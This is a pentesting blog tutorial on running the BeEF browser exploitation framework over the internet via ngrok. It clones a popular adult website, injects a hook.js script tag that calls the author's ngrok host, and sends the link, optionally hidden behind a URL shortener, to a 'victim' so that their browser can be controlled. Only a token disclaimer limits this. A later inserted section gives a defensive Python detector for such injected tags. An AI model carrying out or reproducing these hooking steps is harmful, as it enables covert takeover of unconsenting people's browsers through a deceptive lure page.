Beef-xss over wan with custom page

Hi and welcome to Hacking a rise. Today we are going to be using the beef-over-wan script, which will let us use our beef-xss over the internet.

what is beef

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. … BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

what is ngrok

Ngrok is multiplatform tunnelling and reverse proxy software that establishes secure tunnels from a public endpoint, such as the internet, to a locally running network service, while capturing all traffic for detailed inspection and replay.

what is beef-over-wan

Browser Exploitation Framework is an open-source penetration testing tool that focuses on browser-based vulnerabilities. This Python script makes the changes required to make the hook link accessible over WAN, so anyone can use this framework and attack over WAN without port forwarding [NGROK or any localhost-to-webhost service required].

installing

git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
cd BeeF-Over-Wan
chmod +x BeeFOverWan.py && python BeeFOverWan.py

NGROK Steps
STEP 1 : Add these lines to ngrok.yml [Location .ngrok2/ngrok.yml ]
tunnels:
  first-app:
    addr: 80
    proto: http
  second-app:
    addr: 3000
    proto: http
STEP 2 : Now start ngrok with :
ngrok start --all
STEP 3 : You will see 2 different links forwarded to
Localhost:80 [ Link to be sent to victim ]
Localhost:3000 [ Your link will be connecting to.. ]
STEP 4 : Enter these links in the script and follow the steps given in the script.

Requirements
Beef-xss [Browser Exploitation Framework]
Apache
NGROK [If you want to do this without Port Forwarding]

Right, now that we've got that out of the way, we can start Beef-over-wan. Open a terminal and type ngrok start --all

Now we start beef-over-wan and the apache2 server. Open a terminal and type service apache2 start, then cd BeeF-Over-Wan, and then python BeeFOverWan.py

Now we press 0 and then Enter. This will show us the ngrok settings, if you didn't already set them.

Now we hit Enter and it asks us to give the ngrok link we want to send to the target, so we use the one that's running on port 80. In my case it's 2504e17a.ngrok.io, so I copied it without the http, pasted it into the terminal and hit Enter.

Now we add the URL for the panel to connect to, that is, the URL running on port 3000. In my case it's 7a77ef5a.ngrok.io, so we copy it and paste it in.

Now, within a few seconds, you will see this pop up.

Now copy the link for the panel and paste it into Firefox. My link is https://7a77ef5a.ngrok.io/ui/authentication; this takes you to the login page of beef-xss.

Now we log in. The default username and password are both beef. When you log in you are greeted with this page.

Now we minimize the beef-xss panel and open two terminals. In both, type cd /var/www/html. Then, in one of them, type nano beef.html and copy in this script:

<script src="http://2504e17a.ngrok.io:80/hook.js">
</script>

Now, in the other terminal, run wget with the URL you want to clone. For this I'm going to use pornhub.com, as it's the porn site people stay on the longest, which gives us more chance of keeping them hooked.

Now we type ls and gedit index.html

It will open the index file in a text editor, and we paste <script src="http://2504e17a.ngrok.io:80/hook.js"></script> under the title in the file.

Now we send this URL, http://2504e17a.ngrok.io, to the target, and when they click it they are hooked.

Now we can start running commands on the target's browser, but me, I'd rather use a link shortener like bitly.
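
Seen from the defending side, the script tag pasted into the cloned page is the artefact to look for. The following is an added example, not part of the original post or of the BeeF-Over-Wan project: a Python check that flags external script tags whose host is a tunnelling service or whose file name is hook.js. The names ScriptAudit and audit_html, the ngrok suffixes other than ngrok.io, and the sample markup are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# ngrok.io is the host seen on this page; the other suffixes are added assumptions.
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok.app", "ngrok-free.app")
HOOK_NAMES = ("hook.js",)  # hook file name from the tag shown on this page


class ScriptAudit(HTMLParser):
    """Collect <script src> tags together with the reasons each looks suspicious."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()  # host the audited page was served from
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if not src:  # inline script, nothing external to check
            return
        url = urlsplit(src)
        host = (url.hostname or "").lower()
        reasons = []
        if any(host == s or host.endswith("." + s) for s in TUNNEL_SUFFIXES):
            reasons.append("tunnel-host")
        if url.path.rsplit("/", 1)[-1].lower() in HOOK_NAMES:
            reasons.append("beef-hook-name")
        if host and host != self.page_host and url.scheme == "http":
            reasons.append("cleartext-third-party")
        if reasons:
            self.findings.append((src, reasons))


def audit_html(html, page_host):
    """Return a list of (src, reasons) for every suspicious script tag in html."""
    parser = ScriptAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a cloned page carrying the tag described in this post.
SAMPLE = """<html><head><title>Home</title>
<script src="http://2504e17a.ngrok.io:80/hook.js"></script>
<script src="https://cdn.example.com/app.js"></script><script>var inline = 1;</script>
</head><body></body></html>"""

if __name__ == "__main__":
    print(audit_html(SAMPLE, "www.example.com"))
```

The same check can be run over pages saved by a web proxy or mail gateway; a hit on both tunnel-host and beef-hook-name is a strong signal that the page was built the way this post describes.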

Disclaimer

Don't use this for evil. In other words, don't use this without the person's consent, as I don't take responsibility for your actions.

pentester
Hi, I'm the laughing man. I'm a pentester and the owner of Hacking a rise.
